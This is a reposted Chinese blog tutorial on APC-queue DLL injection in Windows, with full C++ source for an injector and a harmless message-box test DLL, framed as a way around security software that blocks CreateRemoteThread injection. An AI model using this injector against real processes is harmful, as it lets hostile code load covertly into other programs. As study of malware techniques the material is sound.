安全之路 —— 利用APC队列实现跨进程注入

最新推荐文章于 2024-02-02 14:17:41 发布
最新推荐文章于 2024-02-02 14:17:41 发布
阅读量246 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/PeterZ1997/p/10584557.html
版权

简介

在之前的文章中笔者曾经为大家介绍过使用CreateRemoteThread函数来实现远程线程注入(链接),毫无疑问最经典的注入方式,但也因为如此,这种方式到今天已经几乎被所有安全软件所防御。所以今天笔者要介绍的是一种相对比较“另类”的方式,被称作“APC注入”。APC(Asynchronous Procedure Call),全称为异步过程调用,指的是函数在特定线程中被异步执行。简单地说,在Windows操作系统中,每一个进程的每一个线程都有自己的APC队列,可以使用QueueUserAPC函数把一个APC函数压入APC队列中。当处于用户模式的APC被压入到线程APC队列后,线程并不会立刻执行压入的APC函数,而是要等到线程处于可通知状态才会执行,也就是说,只有当一个线程内部调用WaitForSingleObject, WaitForMultiObjects, SleepEx等函数将自己处于挂起状态时,才会执行APC队列函数,执行顺序与普通队列相同,先进先出(FIFO),在整个执行过程中,线程并无任何异常举动,不容易被察觉,但缺点是对于单线程程序一般不存在挂起状态,所以APC注入对于这类程序没有明显效果。

代码样例

  • DLL程序代码

//
// FileName : HelloWorldDll.cpp
// Creator : PeterZheng
// Date : 2018/11/02 11:10
// Comment : HelloWorld Test DLL ^_^
//


#include <iostream>
#include <Windows.h>

using namespace std;

BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD     fdwReason,
    _In_ LPVOID    lpvReserved
)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
  • 注入程序代码

//
// FileName : APCInject.cpp
// Creator : PeterZheng
// Date : 2018/12/17 16:27
// Comment : APC Injector
//


#pragma once

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <strsafe.h>
#include <Windows.h>
#include <TlHelp32.h>

using namespace std;

// 根据进程名字获取进程Id
BOOL GetProcessIdByName(CHAR *szProcessName, DWORD& dwPid)
{
    HANDLE hSnapProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapProcess == NULL)
    {
        printf("[*] Create Process Snap Error!\n");
        return FALSE;
    }
    PROCESSENTRY32 pe32 = { 0 };
    RtlZeroMemory(&pe32, sizeof(pe32));
    pe32.dwSize = sizeof(pe32);
    BOOL bRet = Process32First(hSnapProcess, &pe32);
    while (bRet)
    {
        if (_stricmp(pe32.szExeFile, szProcessName) == 0)
        {
            dwPid = pe32.th32ProcessID;
            return TRUE;
        }
        bRet = Process32Next(hSnapProcess, &pe32);
    }
    return FALSE;
}

// 获取对应进程Id的所有线程Id
BOOL GetAllThreadIdByProcessId(DWORD dwPid, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
    DWORD dwThreadIdListLength = 0;
    DWORD dwThreadIdListMaxCount = 2000;
    LPDWORD pThreadIdList = NULL;
    pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pThreadIdList == NULL)
    {
        printf("[*] Create Thread Id Space Error!\n");
        return FALSE;
    }
    RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));
    THREADENTRY32 te32 = { 0 };
    RtlZeroMemory(&te32, sizeof(te32));
    te32.dwSize = sizeof(te32);
    HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hThreadSnapshot == NULL)
    {
        printf("[*] Create Thread Snap Error!\n");
        return FALSE;
    }
    BOOL bRet = Thread32First(hThreadSnapshot, &te32);
    while (bRet)
    {
        if (te32.th32OwnerProcessID == dwPid)
        {
            if (dwThreadIdListLength >= dwThreadIdListMaxCount)
            {
                break;
            }
            pThreadIdList[dwThreadIdListLength++] = te32.th32ThreadID;
        }
        bRet = Thread32Next(hThreadSnapshot, &te32);
    }
    *pThreadIdListLength = dwThreadIdListLength;
    *ppThreadIdList = pThreadIdList;
    return TRUE;
}

// 主函数
int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        printf("[*] Format Error!  \nYou Should FOLLOW THIS FORMAT: <APCInject EXENAME DLLNAME> \n");
        return 0;
    }
    LPSTR szExeName = (LPSTR)VirtualAlloc(NULL, 100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPSTR szDllPath = (LPSTR)VirtualAlloc(NULL, 100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlZeroMemory(szExeName, 100);
    RtlZeroMemory(szDllPath, 100);
    StringCchCopy(szExeName, 100, argv[1]);
    StringCchCopy(szDllPath, 100, argv[2]);
    DWORD dwPid = 0;
    BOOL bRet = GetProcessIdByName(szExeName, dwPid);
    if (!bRet)
    {
        printf("[*] Get Process Id Error!\n");
        return 0;
    }
    LPDWORD pThreadIdList = NULL;
    DWORD dwThreadIdListLength = 0;
    bRet = GetAllThreadIdByProcessId(dwPid, &pThreadIdList, &dwThreadIdListLength);
    if (!bRet)
    {
        printf("[*] Get All Thread Id Error!\n");
        return 0;
    }
    // 打开进程
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (hProcess == NULL)
    {
        printf("[*] Open Process Error!\n");
        return 0;
    }
    DWORD dwDllPathLen = strlen(szDllPath) + 1;
    // 申请目标进程空间,用于存储DLL路径
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpBaseAddress == NULL)
    {
        printf("[*] VirtualAllocEx Error!\n");
        return 0;
    }
    SIZE_T dwWriten = 0;
    // 把DLL路径字符串写入目标进程
    WriteProcessMemory(hProcess, lpBaseAddress, szDllPath, dwDllPathLen, &dwWriten);
    if (dwWriten != dwDllPathLen)
    {
        printf("[*] Write Process Memory Error!\n");
        return 0;
    }
    LPVOID pLoadLibraryFunc = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    if (pLoadLibraryFunc == NULL)
    {
        printf("[*] Get Func Address Error!\n");
        return 0;
    }
    HANDLE hThread = NULL;
    // 倒序插入线程APC,可避免出现在插入时进程崩溃的现象
    for (int i = dwThreadIdListLength - 1; i >= 0; i--)
    {
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
        if (hThread)
        {
            QueueUserAPC((PAPCFUNC)pLoadLibraryFunc, hThread, (ULONG_PTR)lpBaseAddress);
            CloseHandle(hThread);
            hThread = NULL;
        }
    }

    // DLL路径分割,方便输出
    LPCSTR szPathSign = "\\";
    LPSTR p = NULL;
    LPSTR next_token = NULL;
    p = strtok_s(szDllPath, szPathSign, &next_token);
    while (p)
    {
        StringCchCopy(szDllPath, 100, p);
        p = strtok_s(NULL, szPathSign, &next_token);
    }
    printf("[*] APC Inject Info [%s ==> %s] Success\n", szDllPath, szExeName);

    if (hProcess)
    {
        CloseHandle(hProcess);
        hProcess = NULL;
    }
    if (pThreadIdList)
    {
        VirtualFree(pThreadIdList, 0, MEM_RELEASE);
        pThreadIdList = NULL;
    }
    VirtualFree(szDllPath, 0, MEM_RELEASE);
    VirtualFree(szExeName, 0, MEM_RELEASE);
    ExitProcess(0);
    return 0;
}

运行截图

APC注入运行截图

参考资料

  1. 《Windows黑客编程技术详解》【甘迪文 著】

转载于:https://www.cnblogs.com/PeterZ1997/p/10584557.html

dengdao1372
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
编程实现APC注入dll到进程
yeanhoo的博客
09-23 324
APC注入 线程被唤醒时APC中的注册函数会被执行,因此使用QueueUserAPCAPC队列插入函数即可完成注入 #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> BOOL ApcInject(char *,char *); DWORD GetProcessIdByProcessName(char *); BOOL GetAllThreadIdByProcessId(DWORD,PDWORD,P
PHP利用APC模块实现文件上传进度条的方法
10-24
主要介绍了PHP利用APC模块实现文件上传进度条的方法,分析了APC模块的具体用法,并给出了相关配置说明,需要的朋友可以参考下
windows主动防御视频教程
09-07
本套视频教程主要讲windows主动防御视频教程,从windows驱动开发基础到windows的rootkit开发最后到rootkit的检测一步步带领大家从0开始学习windows的rootkit对抗,技术内容主要讲的是各大安全厂商的安全产品底里核心技术,模仿windows上的杀软(ARK)技术展开,如进程模块注入、隐藏、检测等,还重点讲了虚拟化vt、ept等技术,从浅入深。
[Win32]关于进程模块注入的一次尝试,以及为何尽量不要LoadLibrary一个exe
weixin_42969457的博客
02-14 324
尝试直接把exe程序本身注入到远程进程中,并启动一个导出函数。分析产生的问题。
Windows:32位Inline Hook
无名J0kзr的博客
03-13 572
文章目录什么是Inline Hook使用DLL实现对其他进程的Inline Hook 什么是Inline Hook Inline Hook,即内联钩子。 系统提供的API都保存在DLL文件中,当程序运行需要调用某个API时,它会隐式地将此API所在的DLL文件加载到其进程中。那么,如果我们使用一种方法,直接修改DLL中的API函数在内存中的映像,使API函数的首条代码为jmp MyFuncAddress这样就可以执行自己的函数了。 由于这种方法是直接在程序中嵌入jmp指令来实现Hook的,所以把它称为内联钩
进程注入之DLL注入
bj5716的博客
04-17 1万+
前言DLL注入是我在大一的时候接触的一种技术,那时候还不懂,最近结合小程序详细的理解了一下。DLL注入是将代码注入到一个远程进程中,并让远程进程调用LoadLibrary()函数,从而强制远程进程加载一个DLL程序到进程中。而当DLL被加载时就会运行DLL中的DllMain()函数,所以就会为恶意代码的执行提供机会,而因为DLL本身是由感染后的进程加载的同时PE文件也并没有对系统进行过多的敏感操作...
C++ APC注入.zip
08-06
C++ APC注入是一种高级的进程通信技术,常用于在Windows操作系统实现远程线程注入。在本案例中,APC(Asynchronous Procedure Call)注入被用作替代方法,因为直接的DLL注入可能导致某些系统,如Win7,在特定情况...
PHP利用APC模块实现大文件上传进度条的方法
10-23
你可以通过检查`function_exists('apc_fetch')`来验证APC是否已成功安装。 接下来,我们将讨论实现大文件上传进度条的原理。APC的`rfc1867`选项开启后,它会自动处理分块上传(Chunked Upload),并在缓存中存储...
易语言移植的APC注入
07-22
在这个场景中,"易语言移植的APC注入"指的是将APC注入技术应用到易语言的环境中,使得开发者能够利用易语言编写相关的注入程序。 APC注入的基本原理是通过系统调用,将一个函数(通常是一个DLL中的函数)添加到另一...
进程注入系列一之APC注入
weixin_46539164的博客
04-28 3451
什么是APC APC 是一个简称,全称为Asynchronous Procedure Call,叫异步过程调用,是指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制。 MSDN解释为: 相关函数 QueueUserApc:函数作用,添加制定的异步函数调用(回调函数)到执行的线程的APC队列APCproc:函数作用: 回调函数的写法. 核心函数 QueueUserAPC DWORD QueueUserAPC( PAPCFUNCpfnAPC, // APC function HANDLEhT
内核篇-----APC队列介绍
qq_45806710的博客
02-08 1712
APC队列 kd> dt _KAPC nt!_KAPC +0x000 Type : Int2B //APC类型为0x12 +0x002 Size : Int2B //大小为0x30 +0x004 Spare0 : Uint4B +0x008 Thread : Ptr32 _KTHREAD//目标进程 +0x00c ApcListEntry : _LIST_ENTRY /
APC注入以及几种实现方式
include_voidmain的博客
08-02 2017
APC注入以及几种实现方式
第五章 进程注入APC注入(附源码)
test\\的博客
12-01 1712
目录前言函数介绍QueueUserAPC函数语法参数返回值示例程序代码DLL代码测试原理学习 前言 APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码,每一个线程都有一个附加的APC队列,他们在线程处于可警告的时候才被处理;如果程序在线程可警告等待状态时候排入一个APC队列,那么线程将开始执行APC函数,恶意代码则可以设置APC函数抢占可警告等待状态的线程。 函数介绍 QueueUserAPC函数 把一个APC对象加入到指定线程的APC队列中。
APC注入
最新发布
Dokii_i的博客
02-02 545
线程调用SleepEx、SignalObjectAndWait、MsgWaitForMultipleObjectsEx、WaitForMultipleObjectsEx、WaitForSingleObjectEx函数时会进入警告状态,系统会产生一个软中断,线程再次被唤醒时会检查APC队列执行所有APC函数。_KAPC_STATE.KernelApcPending为1则调用 KiDeliverApc 执行APC函数,执行完再循环遍历。用户APC:由应用程序产生,在内核、用户层切换时使用不同栈。
DLL注入APC注入
GeniusLS的博客
08-13 834
本人学习《Windows编程技术》所做的学习笔记 简介:APC为异步调用,指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制,用于异步IO,或者定时器。 大致思路:每一个进程中都有一个APC队列,每当要执行一个函数时,就利用QueueUserAPC函数把一个APC函数压入队列中,当函数要被执行时,我们将函数以先进先出的形式执行函数,此时我们便可以把我们要注入的dll给放入队列中 同步调用:像普通程序一样,需要按序进行,下一条代码必须要等上一条代码执行后,才能运行。 异步调用:...
防游戏检测之易语言APC注入DLL技术
热门推荐
hzw320的博客
08-18 1万+
本文章转载来自:http://bbs.dult.cn/thread-23291-1-1.html APC注入是什么原理? 首先我们得来了解下它是什么东西,才能更好的运用它,关于APC对于懂微软api函数使用的学员来说可能不陌生,新手估计没有接触过。 APC 注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的, 其具体流...
【免杀前置课——Windows编程】十四、异步IO——什么是异步IO、API定位问题、APC调用队列
m0_62783065的博客
12-05 582
【免杀前置课——Windows编程】十四、异步IO——什么是异步IO、API定位问题、APC调用队列
注入(一):APC注入
零点起步
04-14 1408
APC注入:Asynchronous Procedure Call,异步过程调用,每个线程都有一个APC队列,在用户模式下,当线程调用SleepEx,WaitForSingleObjectEx等进入"Alterable Wait Status.  此时系统会遍历APC队列,先进先出地处理其中函数(QueueUserAPC)  优:比较隐蔽 缺:实现的条件苛刻 //负责注入的exe #incl
sas实现apc年龄时期队列
07-24
实现APC(age-period-cohort)年龄时期队列涉及对数据的整理、分析和建模。 APC年龄时期队列分析是一种研究人口或事件在不同年龄、不同时期和不同历史时期的影响的方法。在SAS中,可以使用多种函数和过程来实现这一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值